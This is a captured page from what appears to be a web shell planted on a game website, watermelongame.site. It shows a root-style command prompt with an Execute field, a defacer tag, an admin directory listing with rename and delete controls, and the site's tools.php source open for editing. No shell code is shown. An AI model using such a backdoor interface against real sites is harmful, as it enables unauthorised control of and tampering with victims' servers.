home
/
aioutajg
/
watermelongame.site
/
admin
/
Go to Home Directory
+
Upload
Create File
root@0UT1S:~$
Execute
By Order of Mr.0UT1S
[DIR] ..
N/A
[DIR] assets
N/A
[DIR] functions
N/A
[DIR] includes
N/A
add-ads.php
2.77 KB
Rename
Delete
add-category.php
2.58 KB
Rename
Delete
add-game.php
6.34 KB
Rename
Delete
add-page.php
3.12 KB
Rename
Delete
add-users.php
7.57 KB
Rename
Delete
advertisement.php
1.67 KB
Rename
Delete
api-settings.php
160.89 KB
Rename
Delete
categories.php
2.42 KB
Rename
Delete
comments.php
2.87 KB
Rename
Delete
games.php
5.18 KB
Rename
Delete
index.php
4.91 KB
Rename
Delete
login.php
2.54 KB
Rename
Delete
logout.php
124 bytes
Rename
Delete
pages.php
2.49 KB
Rename
Delete
settings.php
7.06 KB
Rename
Delete
tools.php
2.83 KB
Rename
Delete
users.php
2.67 KB
Rename
Delete
<?php $page = "Tools"; ?> <?php require "../includes/function_general.php"; ?> <?php include "includes/header.php"; ?> <?php include "includes/config.php"; ?> <body> <main class="d-flex"> <?php include "includes/sidebar.php"; ?> <div class="main w-full px-12 py-6"> <div class="games-list flex gap-6"> <!-- <a href="#" class="py-2 px-6 bg-blue-400 text-white uppercase text-xs rounded-md">ADD</a> --> <div class="h-auto dark:bg-zinc-900 overflow-hidden rounded-xl hover:shadow-lg transition duration-300 hover:shadow-sm cursor-pointer w-60 bg-[white]"> <div class="px-12 py-4 flex flex-column text-center justify-center "> <a class="text-slate-700 hover:text-black font-bold dark:hover:text-gray-100 dark:text-gray-200">GameMonetize</a> <span class="text-xs text-gray-400 mt-1 mb-1">By You can add games easily and quickly with API.</span> <a href="api-settings?platform=gamemonetize" class="text-sm text-gray-100 hover:text-white rounded-lg bg-blue-600 py-2 mt-2"> <span class="bi-plus"></span> Add Game</a> </div> </div> <div class="h-auto dark:bg-zinc-900 overflow-hidden rounded-xl hover:shadow-lg transition duration-300 hover:shadow-sm cursor-pointer w-60 bg-[white]"> <div class="px-12 py-4 flex flex-column text-center justify-center "> <a class="text-slate-700 hover:text-black font-bold dark:hover:text-gray-100 dark:text-gray-200">Game Distribution</a> <span class="text-xs text-gray-400 mt-1 mb-1">By You can add games easily and quickly with API.</span> <a href="api-settings?platform=gamedistribution" class="text-sm text-gray-100 hover:text-white rounded-lg bg-blue-600 py-2 mt-2"> <span class="bi-plus"></span> Add Game</a> </div> </div> <div class="h-auto dark:bg-zinc-900 overflow-hidden rounded-xl hover:shadow-lg transition duration-300 hover:shadow-sm cursor-pointer w-60 bg-[white]"> <div class="px-12 py-4 flex flex-column text-center justify-center "> <a class="text-slate-700 hover:text-black font-bold dark:hover:text-gray-100 dark:text-gray-200">GamePix</a> <span class="text-xs text-gray-400 mt-1 mb-1">By You can add games easily and quickly with API.</span> <a href="api-settings?platform=gamepix" class="text-sm text-gray-100 hover:text-white rounded-lg bg-blue-600 py-2 mt-2"> <span class="bi-plus"></span> Add Game</a> </div> </div> </div> </div> </main> <?php include "includes/footer.php"; ?> </body> </html>
Save